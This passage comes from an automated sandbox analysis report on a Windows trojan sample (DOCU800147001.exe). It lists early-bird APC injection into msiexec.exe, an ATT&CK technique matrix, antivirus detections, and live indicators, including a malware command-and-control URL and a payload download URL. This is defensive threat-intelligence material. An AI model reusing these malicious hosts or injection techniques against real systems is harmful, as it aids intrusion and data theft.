      Source: powershell.exe, 00000002.00000002.2527630104.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
      Source: powershell.exe, 00000002.00000002.2527630104.0000000005300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
      Source: msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\DOCU800147001.exeAPI call chain: ExitProcess graph end nodegraph_0-3395
      Source: C:\Users\user\Desktop\DOCU800147001.exeAPI call chain: ExitProcess graph end nodegraph_0-3253
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00405EA5 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA5
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Early bird code injection technique detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3E60000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\DOCU800147001.exeCode function: 0_2_00405B9C GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B9C

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		311
      Process Injection      		1
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)Logon Script (Windows)311
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Software Packing      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials14
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      DOCU800147001.exe18%ReversingLabsWin32.Trojan.Generic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exe18%ReversingLabsWin32.Trojan.Generic
      C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://b2csa.icu/m320%Avira URL Cloudsafe
      http://b2csa.icu/0%Avira URL Cloudsafe
      http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin20%Avira URL Cloudsafe
      http://b2csa.icu/PL341/index.phpFv0%Avira URL Cloudsafe
      http://b2csa.icu/PL341/index.phpal0%Avira URL Cloudsafe
      http://b2csa.icu/PL341/index.phpVVWT0%Avira URL Cloudsafe
      http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin0%Avira URL Cloudsafe
      http://b2csa.icu/PL341/index.phpj0%Avira URL Cloudsafe
      http://b2csa.icu/P50%Avira URL Cloudsafe
      http://b2csa.icu/PL341/index.php100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      electricsuitcase.net
      		107.151.162.135
      		truefalse
        		unknown
        b2csa.icu
        		104.21.32.1
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://b2csa.icu/PL341/index.phptrue
          • Avira URL Cloud: malware
          		unknown
          http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.binfalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
